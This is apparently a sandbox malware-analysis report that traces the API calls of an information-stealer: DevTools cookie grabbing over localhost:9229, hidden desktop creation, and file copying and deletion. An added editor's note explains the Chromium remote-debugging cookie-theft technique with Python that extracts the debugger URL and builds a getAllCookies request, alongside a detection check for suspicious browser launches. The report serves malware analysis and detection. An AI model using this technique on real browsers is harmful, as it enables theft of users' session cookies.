                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02496C2E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$FolderPathlstrcat
                                                    • String ID:
                                                    • API String ID: 2938889746-0
                                                    • Opcode ID: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
                                                    • Instruction ID: c34a19a017d7659214b0e874e2527225c4bfbd69b746a3547e2cd5adc3c39dd7
                                                    • Opcode Fuzzy Hash: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
                                                    • Instruction Fuzzy Hash: F2F1B070A11256ABDF21EF79CC48BAF7BBAAF44308F05452AE81597350DB78D942CF90
                                                    APIs
                                                      • Part of subcall function 004090F0: InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
                                                      • Part of subcall function 004090F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
                                                      • Part of subcall function 004090F0: InternetCloseHandle.WININET(00000000), ref: 00409139
                                                      • Part of subcall function 004090F0: strlen.MSVCRT ref: 00409155
                                                    • strlen.MSVCRT ref: 00409311
                                                    • strlen.MSVCRT ref: 0040932A
                                                      • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
                                                      • Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
                                                      • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28
                                                      • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                    • memset.MSVCRT ref: 00409371
                                                    • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040938C
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004093A2
                                                    • strlen.MSVCRT ref: 004093C9
                                                    • strlen.MSVCRT ref: 00409416
                                                    • memcmp.MSVCRT(?,0042D01C,?), ref: 0040943B
                                                    • memset.MSVCRT ref: 00409562
                                                    • lstrcatA.KERNEL32(?,cookies), ref: 00409577
                                                    • lstrcatA.KERNEL32(?,00431D64), ref: 00409589
                                                    • lstrcatA.KERNEL32(?,?), ref: 0040959A
                                                    • lstrcatA.KERNEL32(?,00435160), ref: 004095AC
                                                    • lstrcatA.KERNEL32(?,?), ref: 004095BD
                                                    • lstrcatA.KERNEL32(?,.txt), ref: 004095CF
                                                    • lstrlenA.KERNEL32(?), ref: 004095E6
                                                    • lstrlenA.KERNEL32(?), ref: 0040960B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00409644
                                                    • memset.MSVCRT ref: 0040968C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
                                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                    • API String ID: 2819545660-3542011879
                                                    • Opcode ID: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
                                                    • Instruction ID: 864a5aaf990fcff81b4d6c55bfc79a47d2bf5be1f833ff5f37dcccbcd604048f
                                                    • Opcode Fuzzy Hash: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
                                                    • Instruction Fuzzy Hash: 3EE12671E00218EBDF14DFA8C984ADEBBB5AF48304F50447AE509B7291DB789E45CF98
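Editor's note on the function above (the 00409311 trace): InternetOpenUrlA on http://localhost:9229/json, a memchr/memcmp scan for "webSocketDebuggerUrl":, lstrcatA of ws://localhost:9229 and then of cookies ... .txt is the Chromium remote-debugging (DevTools protocol) cookie-collection technique. A Chromium browser serves that JSON target list only when it was launched with --remote-debugging-port, and a client that connects to the advertised WebSocket can ask the running browser for its cookies without reading the encrypted cookie database on disk. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox. The /json body and the process command lines are constructed, the parsing reproduces only what the API trace shows (raw substring search, no JSON parser), and the exact cookie-file separators and the DevTools method the sample invokes are not visible in the trace, so the method shown is labelled as an assumption.

```python
# Added example for this report: DevTools /json parsing as the API trace suggests,
# plus a defender-side check for remote-debugging browser launches. Not the sample's code.
from __future__ import annotations

DEBUG_PORT = 9229                            # port seen in the trace (http://localhost:9229/json)
WS_PREFIX = f"ws://localhost:{DEBUG_PORT}"   # string concatenated by lstrcatA in the trace
KEY = b'"webSocketDebuggerUrl":'             # string compared by memcmp in the trace

# Constructed body in the shape Chromium serves at /json (not captured from the sample).
SAMPLE_JSON_BODY = (
    b'[ {\n'
    b'   "description": "",\n'
    b'   "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/0F3A",\n'
    b'   "id": "0F3A",\n'
    b'   "title": "New Tab",\n'
    b'   "type": "page",\n'
    b'   "url": "chrome://newtab/",\n'
    b'   "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/0F3A"\n'
    b'} ]'
)


def extract_ws_debugger_url(body: bytes) -> str | None:
    """Raw scan as the trace suggests: locate the key, then the quoted value after it.

    Mirrors memcmp (compare key) and memchr (find the quote characters) rather than
    a JSON parser. Returns None when the key or a closing quote is missing.
    """
    key_at = body.find(KEY)
    if key_at < 0:
        return None
    open_q = body.find(b'"', key_at + len(KEY))
    if open_q < 0:
        return None
    close_q = body.find(b'"', open_q + 1)
    if close_q < 0:
        return None
    return body[open_q + 1:close_q].decode("ascii", errors="replace")


def devtools_path(ws_url: str) -> str | None:
    """Return the /devtools/... path if the URL points at the expected local debug port.

    The trace shows lstrcatA of ws://localhost:9229 followed by a variable part; this is
    the reverse split, and it rejects anything not on that host:port.
    """
    if not ws_url.startswith(WS_PREFIX + "/devtools/"):
        return None
    return ws_url[len(WS_PREFIX):]


def cdp_get_cookies_message(msg_id: int = 1) -> dict:
    """Assumption: the trace does not show which DevTools method the sample sends.
    Network.getAllCookies is the method commonly used for this purpose."""
    return {"id": msg_id, "method": "Network.getAllCookies"}


# Defender side: a Chromium browser listens on this port only when started with
# --remote-debugging-port. Flag such launches in process-creation telemetry, especially
# together with --headless or a --user-data-dir pointing at the real profile.
SUSPICIOUS_SWITCHES = ("--remote-debugging-port", "--headless", "--user-data-dir")


def remote_debugging_indicators(cmdline: str) -> dict:
    """Report which suspicious Chromium switches appear and the debug port, if any."""
    found = {sw: (sw in cmdline) for sw in SUSPICIOUS_SWITCHES}
    port = None
    marker = "--remote-debugging-port="
    at = cmdline.find(marker)
    if at >= 0:
        digits = ""
        for ch in cmdline[at + len(marker):]:
            if not ch.isdigit():
                break
            digits += ch
        port = int(digits) if digits else None
    found["port"] = port
    found["suspicious"] = found["--remote-debugging-port"]
    return found


# Constructed process command lines (not from the sandbox run).
SAMPLE_CMDLINES = [
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 '
    r'--headless --user-data-dir="C:\Users\u\AppData\Local\Google\Chrome\User Data"',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
]


def scan_cmdlines(cmdlines: list[str]) -> list[int]:
    """Indices of command lines that enable remote debugging."""
    return [i for i, c in enumerate(cmdlines) if remote_debugging_indicators(c)["suspicious"]]


if __name__ == "__main__":
    url = extract_ws_debugger_url(SAMPLE_JSON_BODY)
    print("debugger url:", url)
    print("devtools path:", devtools_path(url) if url else None)
    print("flagged launches:", scan_cmdlines(SAMPLE_CMDLINES))
```

The raw substring scan is deliberately as naive as the trace implies: it takes the first "webSocketDebuggerUrl": in the body, so with several open targets it picks the first one. For detection, the process-creation check is the cheap signal; a browser child of an unexpected parent with --remote-debugging-port set, followed by a local connection to that port, is the pattern this function leaves behind.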
                                                    APIs
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 024A6680
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 024A6699
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024A66B1
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024A66C9
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024A66E2
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024A66FA
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 024A6712
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 024A672B
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 024A6743
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 024A675B
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 024A6774
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 024A678C
                                                      • Part of subcall function 024A6627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024A67A4
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A1E76
                                                    • GetUserDefaultLangID.KERNEL32 ref: 024A1E7C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$DefaultLangUserlstrcpy
                                                    • String ID:
                                                    • API String ID: 4154271814-0
                                                    • Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
                                                    • Instruction ID: a1ded28f3ab14affb8986767e9c2ccdd308ce34eae8202968dbe82225f74c990
                                                    • Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
                                                    • Instruction Fuzzy Hash: C961B130501256AFDB21AF71CC98B6F7ABBAF55749F04102AF90A93260DFB4D801DF60
                                                    APIs
                                                    • lstrcat.KERNEL32(?,?), ref: 02489A3F
                                                    • lstrcat.KERNEL32(?,?), ref: 02489A54
                                                    • lstrcat.KERNEL32(?,0043516C), ref: 02489A67
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • wsprintfA.USER32 ref: 02489AAD
                                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 02489AD0
                                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 02489AEF
                                                    • memset.MSVCRT ref: 02489B0D
                                                    • lstrcat.KERNEL32(?,?), ref: 02489B22
                                                    • lstrcat.KERNEL32(?,?), ref: 02489B34
                                                    • lstrcat.KERNEL32(?,00435128), ref: 02489B44
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02489B81
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02489BB7
                                                    • StrStrA.SHLWAPI(?,00638C5C), ref: 02489BCC
                                                    • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02489BE9
                                                    • lstrlen.KERNEL32(?), ref: 02489BFD
                                                    • wsprintfA.USER32 ref: 02489C0D
                                                    • lstrcpy.KERNEL32(?,?), ref: 02489C24
                                                    • memset.MSVCRT ref: 02489C3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                    • String ID: D
                                                    • API String ID: 171495903-2746444292
                                                    • Opcode ID: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
                                                    • Instruction ID: 4a9b4c3bee5e647b237dfc927a1b2dd912ecee08ce7a36b9443ddbe188e3dd31
                                                    • Opcode Fuzzy Hash: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
                                                    • Instruction Fuzzy Hash: E2915EB1614340AFD720EF64DC45FAE77E9AF88704F10891EFA4987290DBB0A505CBA2
                                                    APIs
                                                    • lstrcat.KERNEL32(?,?), ref: 02489A3F
                                                    • lstrcat.KERNEL32(?,?), ref: 02489A54
                                                    • lstrcat.KERNEL32(?,0043516C), ref: 02489A67
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • wsprintfA.USER32 ref: 02489AAD
                                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 02489AD0
                                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 02489AEF
                                                    • memset.MSVCRT ref: 02489B0D
                                                    • lstrcat.KERNEL32(?,?), ref: 02489B22
                                                    • lstrcat.KERNEL32(?,?), ref: 02489B34
                                                    • lstrcat.KERNEL32(?,00435128), ref: 02489B44
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02489B81
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02489BB7
                                                    • StrStrA.SHLWAPI(?,00638C5C), ref: 02489BCC
                                                    • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02489BE9
                                                    • lstrlen.KERNEL32(?), ref: 02489BFD
                                                    • wsprintfA.USER32 ref: 02489C0D
                                                    • lstrcpy.KERNEL32(?,?), ref: 02489C24
                                                    • memset.MSVCRT ref: 02489C3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                    • String ID: D
                                                    • API String ID: 171495903-2746444292
                                                    • Opcode ID: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
                                                    • Instruction ID: 6a210b58decdcf7b3210da5d3c9159877a7a6597a27e01c311ee583e39ed96a4
                                                    • Opcode Fuzzy Hash: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
                                                    • Instruction Fuzzy Hash: 0C914EB1614340AFD720EF64DC45FAE77E9AF88704F10891EFA4987291DBB09505CBA6
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
                                                    • lstrlenA.KERNEL32(009254F0,00000000,00000000,?,?,00421B61), ref: 00421840
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
                                                    • lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
                                                    • lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
                                                    • lstrlenA.KERNEL32(00925580,?,?,00421B61), ref: 00421925
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0042194C
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00421957
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421986
                                                    • lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 00421998
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004219B9
                                                    • lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004219C5
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004219F4
                                                    • lstrlenA.KERNEL32(009254A0,?,?,00421B61), ref: 00421A0A
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A31
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00421A3C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A6B
                                                    • lstrlenA.KERNEL32(009254C0,?,?,00421B61), ref: 00421A81
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AA8
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00421AB3
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AE2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 1049500425-0
                                                    • Opcode ID: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
                                                    • Instruction ID: 274b4ab71ddff461c781089cdb5a89f9d7377c7fda2b54a99ae9043ae0fda87f
                                                    • Opcode Fuzzy Hash: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
                                                    • Instruction Fuzzy Hash: 84914CB57017039BD720AFB6DD88A17B7E9AF14344B54583EA881D33B1DBB8D841CBA4
                                                    APIs
                                                    • memset.MSVCRT ref: 024812F1
                                                      • Part of subcall function 02481267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0248127C
                                                      • Part of subcall function 02481267: RtlAllocateHeap.NTDLL(00000000), ref: 02481283
                                                      • Part of subcall function 02481267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024812A0
                                                      • Part of subcall function 02481267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024812BA
                                                      • Part of subcall function 02481267: RegCloseKey.ADVAPI32(?), ref: 024812C4
                                                    • lstrcat.KERNEL32(?,00000000), ref: 02481307
                                                    • lstrlen.KERNEL32(?), ref: 02481314
                                                    • lstrcat.KERNEL32(?,00431D48), ref: 0248132F
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481366
                                                    • lstrlen.KERNEL32(006389F0), ref: 02481374
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481398
                                                    • lstrcat.KERNEL32(00000000,006389F0), ref: 024813A0
                                                    • lstrlen.KERNEL32(00431D50), ref: 024813AB
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024813CF
                                                    • lstrcat.KERNEL32(00000000,00431D50), ref: 024813DB
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02481401
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481446
                                                    • lstrlen.KERNEL32(00638CA4), ref: 02481455
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248147C
                                                    • lstrcat.KERNEL32(00000000,?), ref: 02481484
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024814BF
                                                    • lstrcat.KERNEL32(00000000), ref: 024814CC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024814F3
                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0248151C
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481548
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481584
                                                      • Part of subcall function 0249F197: lstrcpy.KERNEL32(00000000,?), ref: 0249F1C9
                                                    • DeleteFileA.KERNEL32(?), ref: 024815B8
                                                    • memset.MSVCRT ref: 024815D5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 1397529057-0
                                                    • Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
                                                    • Instruction ID: ba6dd6ed9d934af88336fc0094673bf167eb8e90a08850596e80fa1d6eeb7de5
                                                    • Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
                                                    • Instruction Fuzzy Hash: 81A19571A21255ABDB21FF75CC88E9F7BBAAF44704F04442AE809E7250DB74D942DFA0
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
                                                    • ExitProcess.KERNEL32 ref: 00418D27
                                                    • strtok_s.MSVCRT ref: 00418D39
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcessstrtok_s
                                                    • String ID: block
                                                    • API String ID: 3407564107-2199623458
                                                    • Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
                                                    • Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
                                                    • Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
                                                    • Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69
                                                    APIs
                                                    • lstrcpy.KERNEL32 ref: 0249AE96
                                                    • lstrlen.KERNEL32(00638DD4), ref: 0249AEAC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AED4
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249AEDF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AF08
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AF4B
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249AF55
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AF7E
                                                    • lstrlen.KERNEL32(0043509C), ref: 0249AF98
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AFBA
                                                    • lstrcat.KERNEL32(00000000,0043509C), ref: 0249AFC6
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AFEF
                                                    • lstrlen.KERNEL32(0043509C), ref: 0249B001
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B023
                                                    • lstrcat.KERNEL32(00000000,0043509C), ref: 0249B02F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B058
                                                    • lstrlen.KERNEL32(00638DB8), ref: 0249B06E
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B096
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249B0A1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B0CA
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249B106
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249B110
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B136
                                                    • lstrlen.KERNEL32(00000000), ref: 0249B14C
                                                    • lstrcpy.KERNEL32(00000000,00638A98), ref: 0249B17F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen
                                                    • String ID:
                                                    • API String ID: 2762123234-0
                                                    • Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
                                                    • Instruction ID: 06d89c0ffcb678c9f07cee09fdb294be7c9c151084d4b93f17a80b3fe843d218
                                                    • Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
                                                    • Instruction Fuzzy Hash: D7B15C71911666ABDB22EF75DC88AAF7BB6BF40308F04042AE81597250EBB4D941DF90
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A1A96
